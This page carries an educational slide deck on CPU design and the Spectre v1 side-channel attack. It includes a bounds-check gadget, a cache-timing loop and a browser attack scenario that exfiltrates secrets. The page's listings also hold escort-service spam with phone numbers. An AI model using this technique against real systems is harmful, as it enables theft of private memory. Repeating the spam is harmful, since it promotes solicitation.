 
Nvidia tegra K1 Presentation
Nvidia tegra K1 PresentationNvidia tegra K1 Presentation
Nvidia tegra K1 PresentationANURAG SEKHSARIA
 
OOW 2013: Where did my CPU go
OOW 2013: Where did my CPU goOOW 2013: Where did my CPU go
OOW 2013: Where did my CPU goKristofferson A
 
emips_overview_apr08
emips_overview_apr08emips_overview_apr08
emips_overview_apr08Neil Pittman
 
Cpu高效编程技术
Cpu高效编程技术Cpu高效编程技术
Cpu高效编程技术Feng Yu
 
Sql sever engine batch mode and cpu architectures
Sql sever engine batch mode and cpu architecturesSql sever engine batch mode and cpu architectures
Sql sever engine batch mode and cpu architecturesChris Adkin
 

Similar a The Spectre of Meltdowns (20)

了解Cpu
了解Cpu了解Cpu
了解Cpu
 
Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)
 
Understanding DPDK
Understanding DPDKUnderstanding DPDK
Understanding DPDK
 
Where Did My CPU Go?
Where Did My CPU Go?Where Did My CPU Go?
Where Did My CPU Go?
 
Rmoug13 - where did my CPU go?
Rmoug13 - where did my CPU go?Rmoug13 - where did my CPU go?
Rmoug13 - where did my CPU go?
 
RMOUG 2013 - Where did my CPU go?
RMOUG 2013 - Where did my CPU go?RMOUG 2013 - Where did my CPU go?
RMOUG 2013 - Where did my CPU go?
 
Super scaling singleton inserts
Super scaling singleton insertsSuper scaling singleton inserts
Super scaling singleton inserts
 
RedGateWebinar - Where did my CPU go?
RedGateWebinar - Where did my CPU go?RedGateWebinar - Where did my CPU go?
RedGateWebinar - Where did my CPU go?
 
PerfUG 3 - perfs système
PerfUG 3 - perfs systèmePerfUG 3 - perfs système
PerfUG 3 - perfs système
 
General Purpose Computing using Graphics Hardware
General Purpose Computing using Graphics HardwareGeneral Purpose Computing using Graphics Hardware
General Purpose Computing using Graphics Hardware
 
Troubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting Linux Kernel Modules And Device DriversTroubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting Linux Kernel Modules And Device Drivers
 
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
 
Processors selection
Processors selectionProcessors selection
Processors selection
 
Dpdk applications
Dpdk applicationsDpdk applications
Dpdk applications
 
Performance evaluation with Arm HPC tools for SVE
Performance evaluation with Arm HPC tools for SVEPerformance evaluation with Arm HPC tools for SVE
Performance evaluation with Arm HPC tools for SVE
 
Nvidia tegra K1 Presentation
Nvidia tegra K1 PresentationNvidia tegra K1 Presentation
Nvidia tegra K1 Presentation
 
OOW 2013: Where did my CPU go
OOW 2013: Where did my CPU goOOW 2013: Where did my CPU go
OOW 2013: Where did my CPU go
 
emips_overview_apr08
emips_overview_apr08emips_overview_apr08
emips_overview_apr08
 
Cpu高效编程技术
Cpu高效编程技术Cpu高效编程技术
Cpu高效编程技术
 
Sql sever engine batch mode and cpu architectures
Sql sever engine batch mode and cpu architecturesSql sever engine batch mode and cpu architectures
Sql sever engine batch mode and cpu architectures
 

Más de Andriy Berestovskyy

Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)Andriy Berestovskyy
 
Networking Fundamentals: IPv4 Routing and Support Protocols
Networking Fundamentals: IPv4 Routing and Support ProtocolsNetworking Fundamentals: IPv4 Routing and Support Protocols
Networking Fundamentals: IPv4 Routing and Support ProtocolsAndriy Berestovskyy
 
Networking Fundamentals: Computer Network Basics
Networking Fundamentals: Computer Network BasicsNetworking Fundamentals: Computer Network Basics
Networking Fundamentals: Computer Network BasicsAndriy Berestovskyy
 
Networking Fundamentals: Local Networks
Networking Fundamentals: Local NetworksNetworking Fundamentals: Local Networks
Networking Fundamentals: Local NetworksAndriy Berestovskyy
 
Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017Andriy Berestovskyy
 
IPsec Basics: AH and ESP Explained
IPsec Basics: AH and ESP ExplainedIPsec Basics: AH and ESP Explained
IPsec Basics: AH and ESP ExplainedAndriy Berestovskyy
 

Más de Andriy Berestovskyy (6)

Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)
 
Networking Fundamentals: IPv4 Routing and Support Protocols
Networking Fundamentals: IPv4 Routing and Support ProtocolsNetworking Fundamentals: IPv4 Routing and Support Protocols
Networking Fundamentals: IPv4 Routing and Support Protocols
 
Networking Fundamentals: Computer Network Basics
Networking Fundamentals: Computer Network BasicsNetworking Fundamentals: Computer Network Basics
Networking Fundamentals: Computer Network Basics
 
Networking Fundamentals: Local Networks
Networking Fundamentals: Local NetworksNetworking Fundamentals: Local Networks
Networking Fundamentals: Local Networks
 
Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017
 
IPsec Basics: AH and ESP Explained
IPsec Basics: AH and ESP ExplainedIPsec Basics: AH and ESP Explained
IPsec Basics: AH and ESP Explained
 

Último

10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024Mind IT Systems
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionOnePlan Solutions
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...harshavardhanraghave
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplatePresentation.STUDIO
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesVictorSzoltysek
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfproinshot.com
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnAmarnathKambale
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidPhilip Schwarz
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsJhone kinadey
 
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfryanfarris8
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...kalichargn70th171
 

Último (20)

10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
 

The Spectre of Meltdowns

  • 1. Andriy Berestovskyy 2018 The Spectre of Meltdowns ( ц ) А н д р і й Б е р е с т о в с ь к и й networking hourTCP UDP NAT IPsec IPv4 IPv6 internet protocolsAH ESP authentication authorization accounting encapsulation security BGP OSPF ICMP ACLSNAT tunnelPPPoE GRE ARP discovery NDP OSI broadcast multicast IGMP PIM MAC DHCP DNS fragmentation semihalf berestovskyy
  • 2. The Spectre of Meltdowns ● Evolution of CPUs ● Spectre1 Attack ● Security Holy Grail ● Meltdown3 Attack ● Fixes ● Spectre-Based Meltdown PoC 2 CPU?
  • 3. Central Processing Unit (CPU) — electronic circuitry that performs basic arithmetic, logical, control and input/output operations specified by the instructions. — Wikipedia 3 Basic means simple, right?
  • 4. Modern CPU Die 4Source: Kaby Lake, https://newsroom.intel.com/press-kits/8th-gen-intel-core/ Why it’s so complicated? About 2 billion transistors How does it work?
  • 5. CPU Basic Operation Cycle* 5 Hardware implementation? Start Fetch Instruction at PC Decode Instruction Load Data From Memory Execute Instruction Write Data to Memory Update Registers and PC * Instruction Cycle
  • 7. Instructions Per Second (IPS) — measure of a computer's processor speed. — Wikipedia 7 MIPS? FLOPS?
  • 8. 4MHz CPU Performance 8 Cycle 1 Fetch Decode Execute Write 2 3 4 5 6 7 8 Fetch Decode Execute Write mov ... xor ... cmp ... 9 Fetch 4M cycles per second / 4 cycles per instruction = 1 MIPS Solutions? mov len(%rip), %rdx xor %eax, %eax cmp %rdi, %rdx ... De ...one cycle per instruction? More performance!
  • 9. Instruction pipelining — process different parts of instructions in parallel, i.e. an attempt to keep every part of the CPU busy. — Wikipedia 9 Let’s do it!
  • 11. Performance: Instruction Pipelining 11 Cycle 1 Fetch Decode Execute 2 3 5 6 7 8 Fetch Decode Write mov ... xor ... cmp ... 9 Fetch Basic Pipeline Execute Write div ... Decode Execute Write Write 4 Execute Decode Fetch How many MIPS for 4MHz CPU now?
  • 12. 4MHz CPU with Pipeline 12 Cycle 1 Fetch Decode Execute Write 2 3 4 5 6 7 8 Fetch Decode Execute Write mov ... xor ... cmp ... 9 Fetch 4M cycles per second / 1 cycle per instruction = 4 MIPS Decode Execute Write mov len(%rip), %rdx xor %eax, %eax cmp %rdi, %rdx ... More performance! ...more MHz?
  • 13. 8MHz CPU with Pipeline 13 Cycle 1 F D E W 2 3 4 5 6 7 8 mov ... xor ... cmp ... 9 8M cycles per second / 1 cycle per instruction = 8 MIPS More performance? F D E W F D E W 10 11 12 13 14 15 16 17 mov len(%rip), %rdx xor %eax, %eax cmp %rdi, %rdx ...
  • 14. 40MHz CPU Performance 14 Cycle mov ... xor ... cmp ... 40M cycles per second / 1 cycle per instruction = 40 MIPS? Really? mov len(%rip), %rdx xor %eax, %eax cmp %rdi, %rdx ...
  • 15. Clock Speed Does Not Scale 15 Cycle mov ... xor ... cmp ... 40M cycles per second / 1 cycle per instruction = 40 MIPS Source: https://en.wikipedia.org/wiki/Megahertz_myth Why?
  • 16. Memory Trends 16Source: https://en.wikipedia.org/wiki/CAS_latency (First Word) DRAM latency is the same since mid `90s Solutions? More performance! ...but DRAM is slow...
  • 17. Cache — faster memory, closer to a CPU, which stores copies of frequently used main memory locations. — Wikipedia 17 Let’s do it!
  • 18. CPU with Pipeline and Cache 18 InstructionFetch/Decode Memory PC InstructionDecode/Execute Registers InstructionExecute/Write ALU Performance? Data Cache Instr. Cache Write Buffer * Intel i486 and newer WriteExecuteDecode/LoadInstruction Fetch What’s changed?
  • 19. divdiv ... xor ... stall CPU with Pipeline and Cache 19 Cycle mov ... xor ... cmp ... 40M cycles per second / ~4 cycles per instruction = ~10 MIPS stall Stalls :(Stalls :( Solution? ...but pipeline sometimes stalls... More performance! cache miss
  • 20. Superscalar CPU — executes more than one instruction during a clock cycle using different execution units. — Wikipedia 20 Let’s do it!
  • 21. Superscalar CPU Instruction Cycle 21 Performance? Start Fetch Two Instructions Decode Two Instruction Load Order: D1, D2 Execute Two Instructions Write Order: D1, D2 Update Order: D1, D2 * Intel Pentium and newer Why order?
  • 22. stalldiv ... xor ... write ordering Superscalar CPU with Cache 22 Cycle mov ... xor ... cmp ... 40M CPS / ~4 CPI * 1,5 instructions per cycle = ~15 MIPS Solutions? cache miss read ordering Ordering :( ...but stall due to ordering... More performance! div
  • 23. Out-of-Order (dynamic) Execution — processor executes instructions in order of input data and execution units availability, not by their original order in a program. — Wikipedia 23 Let’s do it!
  • 24. divdiv ... xor ... Out of Order CPU 24 Cycle mov ... xor ... cmp ... What about conditional jumps? cache miss Read reordering :( * Intel Pentium Pro and newer Write reordering :( Re-order buffers on Intel CPUs improves average instructions per cycle ratio Why?
  • 25. Conditional Jumps uint8_t array[ 256]; size_t array_size = 256; uint8_t bounds_check(size_t idx) { if (idx < array_size) return array[idx]; return 0; } 25 bounds_check: xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov array(%rdi), %eax .L1: ret Performance? Full source: https://godbolt.org/g/Snb13E
  • 26. dependencyjbe ... mov or ret? OoO CPU vs Conditional Jumps 26 Cycle cmp ... cache miss Solutions? xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov array(%rdi), %eax .L1: ret xor ... stall? ...but next instruction is unknown... More performance! PC PC
  • 27. Speculative Execution —perform some tasks that may not be needed. — Wikipedia 27 Let’s do it!
  • 28. dependencyjbe ... CPU with Speculative Execution 28 Cycle cmp ... cache miss What if speculation is incorrect? xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov array%rdi), %eax .L1: ret xor ... speculation cache missmov* ret* speculation PC PC Continue with mov!
  • 29. branch miss penalty dependencyjbe ... Branch Miss 29 Cycle cmp ... cache miss xor ... speculation cache missmov* ret* icache missret Options? speculation Flush the pipeline! ...but branch misses are very expensive... More performance! PC miss
  • 30. Speculation Options 30 xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 ret ... mov array(%rd), %eax ret ... Options: 1. Execute left branch 2. Execute right branch 3. Execute both branches 4. Other? Pros/cons? Solution?
  • 31. Branch Predictor — digital circuit that tries to guess which way a branch will go before this is known definitively. — Wikipedia 31 How does it work?
  • 32. jbe ... Branch Predictor 32 cmp ... xor ... mov ... ret ... ... Y Y Y Y Branch History Table N N N N N Y Y Y Y Y Y Y Y Y N Y N N N N N N N N last n-bits of instruction address 2n elements Y Y Y Y prediction ... ... Source: https://en.wikipedia.org/wiki/Branch_predictor Let’s do it!
  • 33. dependencyjbe ... CPU with Branch Predictor 33 Cycle cmp ... cache miss xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov array(%rdi), %eax .L1: ret xor ... mov* ret* Solutions? speculationspeculation cache miss ...but there are no more ideas... More performance! PC PC Prediction: do not take branch
  • 34. Multi-Core Processor — CPU with two or more independent processing units called cores, which read and execute program instructions. — Wikipedia 34 How many cores?
  • 35. CPU Trends 35Source: https://en.wikipedia.org/wiki/List_of_Intel_CPU_microarchitectures and https://en.wikipedia.org/wiki/Transistor_count CPU clock limit? Summary? 72 cores * 4 = 288 threads
  • 36. CPU Performance Summary + Instruction Pipelines + Memory Cache + Superscalar Execution + Out of Order Execution + Speculative Execution + Branch Prediction + Multiple Cores ± CPU Clock (to a certain extent) 36 Modern CPU Core?
  • 37. Modern CPU Core 37Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual Instruction Decode Queue (micro-op queue) Allocate/Rename/Retire/Move Elimination/Zero Idiom Scheduler ALU Vec ALU Vec Shft Vec Add Vec Mul FMA DIV Branch2 ALU Fast LEA Vec ALU Vec Shft Vec Add Vec Mul FMA Slow Int Slow LEA ALU Fast LEA Vec ALU Vec Shuff LD/STA LD/STA STD STA 32K L1 Data Cache 256K L2 Cache 32K L1 Instruct. Cache MSROM Decoded Icache Legacy Decode Pipeline Branch Prediction Unit ALU SHFT Branch1 Port 0 Port 1 Port 5 Port 6 P. 2 P. 3 P. 4 P. 7 Modern CPU Die? L3
  • 38. Modern CPU Die 38 A L U A L U A L U 1 2 1 BPU A L U A L U A L U A L U 1 2 1 BPU A L U A L U A L U A L U 1 2 1 BPU A L U L3Cache L3Cache System Agent Memory Controller InterconnectGPU A L U A L U A L U 1 2 1 BPU A L U A L U A L U A L U 1 2 1 BPU A L U A L U A L U A L U 1 2 1 BPU A L U L3Cache L3Cache CPU Core CPU Core CPU Core CPU Core CPU Core CPU Core Source: https://newsroom.intel.com/press-kits/8th-gen-intel-core/ So, why it’s so complicated? About 2 billion transistors
  • 39. Because we need performance! 39 So, what about Spectre et al?
  • 40. All Your Secrets Belong to Us () uint8_t array[ 256 * 4096]; size_t array_size = 256; uint8_t bounds_check(size_t idx) { if (idx < array_size) return array[idx * 4096]; return 0; } 40 bounds_check: xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 sal $12, %rdi mov array(%rdi), %eax .L1: ret Execution? Full source: https://godbolt.org/g/Snb13E Why?
  • 41. dependencyjbe ... Bounds Check on Modern CPU 41 Cycle cmp ... cache miss xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 sal $12, %rdi mov array(%rdi), %eax xor ... mov* sal* speculation cache miss What about cache? PC PC speculation Prediction: do not take branch
  • 42. sal* speculation Virtual Memory dependencyjbe ... Memory Prior Cache Misses 42 array cmp ... cache miss cmp %rdi, array_size(%rip) jbe .L1 sal $12, %rdi mov array(%rdi), %eax mov* speculationcache miss What will happen after execution? array_size array_size * 4096 “cold” memory cached memory PC PC Current Cycle Prediction: do not take branch
  • 43. Virtual Memory dependencyjbe ... Memory After Cache Misses 43 array cmp ... cache miss cmp %rdi, array_size(%rip) jbe .L1 sal $12, %rdi mov array(%rdi), %eax mov* cache miss array_size “cold” memory cached memory What if we missed the branch? PC PC Current Cycle sal* speculation speculation Prediction: do not take branch array_size * 4096
  • 44. cmp ... cache miss Virtual Memory dependencyjbe ... Memory After Branch Miss 44 array sal $12, %rdi mov array(%rdi), %eax .L1: ret mov* cache miss array_size “cold” memory cached memory PC sal* speculation speculation Side effect! miss retPC Flush the pipeline! How to detect cache side effect?
  • 45. Observing Cache Side Effects 45 Virtual Memory arrayarray_size “cold” memory cached memoryuint8_t array[ 256 * 4096]; size_t array_size = 256; ... for (i = 0; i < 256; i++) { start = rdtscp(); tmp = array[i * 4096]; cycles = rdtscp() - start; ... } How can we exploit this side effects? * Simplification Speculation side effect
  • 46. bounds_check(unsigned long): xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov base_array(%rdi), %eax sal $12, %eax mov side_effects(%rax), %eax .L1: rep ret Memory Before Indirect Read 46 Virtual Memory base_arrayarray_size “cold” memory cached memory size_t array_size = 16; uint8_t side_effects[256 * 4096]; uint8_t base_array[16]; uint8_t bounds_check(uint64_t idx) { if (idx < array_size) { uint8_t byte = base_array[idx]; return side_effects[byte * 4096]; } return 0; } After? side_effects byte = base_array[idx] side_effects[byte * 4096] precached data array_size Full source: https://github.com/berestovskyy/spectre-meltdown Cache miss! Cache miss! Why?
  • 47. bounds_check(unsigned long): xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov base_array(%rdi), %eax sal $12, %eax mov side_effects(%rax), %eax .L1: rep ret Memory After Indirect Read 47 Virtual Memory base_arrayarray_size “cold” memory cached memory size_t array_size = 16; uint8_t side_effects[256 * 4096]; uint8_t base_array[16]; uint8_t bounds_check(uint64_t idx) { if (idx < array_size) { uint8_t byte = base_array[idx]; return side_effects[byte * 4096]; } return 0; } Pipeline? side_effects byte = base_array[idx] side_effects[byte * 4096] precached data array_size Full source: https://github.com/berestovskyy/spectre-meltdown
  • 48. dependencyjbe ... Bounds Check Pipeline 48 Cycle cmp ... array_size bounds_check(unsigned long): cmp %rdi, array_size(%rip) jbe .L1 mov base_array(%rdi), %eax sal $12, %eax mov side_effects(%rax), %eax mov* mov* Prediction: do not take branch speculation side_effects PC PC sal* Data is precached Speculative read from side_effect Can we reach outside the array?
  • 49. bounds_check(unsigned long): xor %eax, %eax cmp %rdi, array_size(%rip) jbe .L1 mov base_array(%rdi), %eax sal $12, %eax mov side_effects(%rax), %eax .L1: rep ret Bounds Check Bypass 49 Virtual Memory base_arrayarray_size “cold” memory cached memory secret size_t array_size = 16; uint8_t side_effects[256 * 4096]; uint8_t base_array[16]; uint8_t bounds_check(uint64_t idx) { if (idx < array_size) { uint8_t secret = base_array[idx]; return side_effects[secret * 4096]; } return 0; } Spectre? side_effects secret = base_array[idx], idx = secret - base_array side_effects[secret * 4096] precached secret array_size Full source: https://github.com/berestovskyy/spectre-meltdown
  • 50. Putting All Together: Spectre1 1. Call few times bounds_check() with valid index 2. Flush array_size from cache to get cache miss 3. Call bounds_check with index pointing to secret 4. Use secret as an index to side_effects 5. Observe side_effects access time 50Full source: https://github.com/berestovskyy/spectre-meltdown Summary?
  • 51. Spectre1 Summary 1. Reason: cache side effects 2. The source code is valid, no (easy) fix in software 3. Cache side-channel might be fixed in the future 4. Reads any byte within current process memory 51 Is it even dangerous?
  • 52. 1. eBPF 2. Java 3. JavaScript Online checker: https://xlab.tencent.com/special/spectre/ 4. Other JIT engines ouch! Spectre1 Victims 52 Scenarios?
  • 53. HTTP POST secrets.json5 JavaScript Attack Scenario 53 Web Browser Web Server GET /1 2 OK index.html 4 GET /spectre.js3 OK spectre.js Parse index.html Execute spectre.js Execution?
  • 54. cmp r15, [rbp - 0xe0] jnc 0x24dd099bb870 lea rsi, [r12 + rdx * 1] mov rsi, [rsi + r15 * 1] shl rsi, 12 and rsi, 0x1ffffff mov rsi, [rsi + r8 * 1] xor rsi, rdi mov rdi, rsi if (index < base_array.length) { secret = base_array[index | 0]; secret = (((secret * 4096)|0); tmp ^= side_effects[index| 0]|0; } JavaScript Attack Execution 54 Browser base_array length “cold” memory cached memory passwords Meltdown? side_effects JavaScript JIT side_effects[secret * 4096] browser passwordsJIT sandbox Source: Spectre Attacks: Exploiting Speculative Execution, Paul Kocher et al
  • 55. Most important security feature? 55
  • 56. Process isolation — hardware and software technologies designed to protect each process from other processes by by disallowing inter-process memory access. — Wikipedia 56 Hardware? In practice?
  • 57. Virtual Memory — abstraction of the resources that are actually available on a given machine. Combination of hardware and software maps Virtual Addresses into Physical Addresses. — Wikipedia 57 How to map Virtual to Physical?
  • 58. Translation Lookaside Buffer (TLB) — stores recent translations of virtual memory to physical memory, i.e. address-translation cache. Part of CPU memory-management unit (MMU). — Wikipedia 58 Drawings!
  • 59. Process Isolation 59 Process 1 arraymain() Process 2 main() 64 bit virtual address space Kernel syscall() Physical Memory data Swap Why? Mapped by OS, translated using TLB. How to communicate?
  • 60. System Call — programmatic way to request a service from the kernel. Syscall it is a privilege level switch, no process context switch, i.e. syscall is processed in user process context. — Wikipedia 60 Why no process context switch?
  • 61. Skylake TLB Cache Hierarchy 61Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual Level Page Size Entries Instruction First Level Data Instruction First Level Data First Level Data Second Level Second Level ...how to access kernel data? 4KB 4KB 2MB/4MB 2MB/4MB 1GB Shared 4KB and 2/4MB 1GB 128 8 per thread 64 32 4 1536 16 So, if no process context switch... Not that much :(
